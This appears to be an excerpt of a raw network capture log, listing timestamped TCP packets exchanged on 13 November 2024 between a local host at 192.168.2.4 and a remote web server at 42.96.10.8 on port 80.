                                                                                                                                                                                                            Nov 13, 2024 13:25:22.367947102 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.367990971 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.368016005 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.368025064 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.368035078 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.368078947 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.406418085 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.406440020 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.406460047 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.406464100 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.406488895 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.406502962 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.406506062 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.406523943 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.406539917 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.406548023 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.406577110 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.406692982 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.406722069 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.406738997 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.406766891 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.406797886 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.406817913 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.406842947 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.406843901 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.406871080 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.406884909 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.406902075 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.406918049 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.406934023 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.406951904 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.406953096 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.406971931 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.406986952 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.406996965 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.407006025 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.407006025 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.407032967 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.407049894 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.407068968 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.407080889 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.407095909 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.407098055 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.407141924 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.407346010 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.407361031 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.407377958 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.407402992 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.407463074 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.407479048 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.407505989 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.407507896 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.407521963 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.407538891 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.407552958 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.407555103 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.407571077 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.407582998 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.407613039 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.439172983 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.439196110 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.439213037 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.439228058 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.439239025 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.439245939 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.439261913 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.439279079 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.439291954 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.439306021 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.439310074 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.439337015 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.439348936 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.439363956 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.439379930 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.439395905 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.439413071 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.439424038 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.439441919 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.439452887 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.439467907 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.439479113 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.439485073 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.439502001 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.439518929 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.439533949 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.439534903 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.439549923 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.439562082 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.439567089 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.439582109 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.439582109 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.439599037 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.439620018 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.445357084 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.445406914 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.445424080 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.445429087 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.445441008 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.445456982 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.445466042 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.445498943 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.445669889 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.445697069 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.445738077 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.445780039 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.445796967 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.445812941 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.445828915 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.445831060 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.445859909 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.445874929 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.445890903 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.445904970 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.445947886 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.468499899 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.468578100 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.468687057 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.468703032 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.468719959 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.468734980 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.468739986 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.468753099 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.468769073 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.468770027 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.468785048 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.468827009 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.480191946 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.480220079 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.480235100 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.480236053 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.480283022 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.480315924 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.480333090 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.480350971 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.480366945 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.480389118 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.480418921 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.480457067 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.480473995 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.480490923 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.480506897 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.480518103 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.480525017 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.480549097 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.480562925 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.480604887 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.480607033 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.480632067 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.480648041 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.480663061 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.480675936 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.480679989 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.480698109 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.480700016 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.480715990 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.480731964 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.480742931 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.480748892 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.480765104 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.480776072 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.480782986 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.480804920 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.480870962 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.480887890 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.480904102 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.480920076 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.480931997 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.480952024 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.481004953 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.481019974 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.481035948 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.481050968 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.481064081 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.481067896 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.481084108 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.481085062 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.481100082 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.481158018 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.481173992 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.481195927 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.481201887 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.481219053 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.481235027 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.481249094 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.481251955 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.481268883 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.481270075 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.481286049 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.481302977 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.481303930 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.481321096 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.481337070 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.481345892 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.481353998 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.481370926 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.481381893 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.481388092 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.481405020 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.481417894 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.481420994 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.481436968 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.481451988 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.481477976 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.481730938 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.481748104 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.481762886 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.481777906 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.481785059 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.481796026 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.481811047 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.481813908 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.481831074 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.481844902 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.481858969 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.481863022 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.481878996 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.481889009 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.481905937 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.481915951 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.481924057 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.481939077 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.481955051 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.481976986 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.481982946 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.481995106 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.482001066 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.482017040 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.482033014 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.482048035 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.482064009 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.482065916 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.482065916 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.482079029 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.482095957 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.482111931 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.482111931 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.482127905 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.482141972 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.482146025 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.482161045 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.482165098 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.482178926 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.482193947 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.482208967 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.482224941 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.482446909 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.482462883 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.482480049 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.482495070 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.482497931 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.482522011 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.482539892 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.482547045 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.482557058 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.482570887 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.482574940 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.482601881 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.482603073 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.482618093 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.482635975 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.482650995 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.482670069 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.482687950 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.482692957 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.482709885 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.482724905 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.482741117 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.482743979 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.482758999 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.482775927 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.482778072 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.482791901 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.482805967 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.482808113 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.482824087 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.482840061 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.482855082 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.482857943 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.482875109 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.482882977 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.482899904 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.482918024 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.482928991 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.482933044 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.482948065 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.482949972 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.482966900 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.482980967 CET804973342.96.10.8192.168.2.4
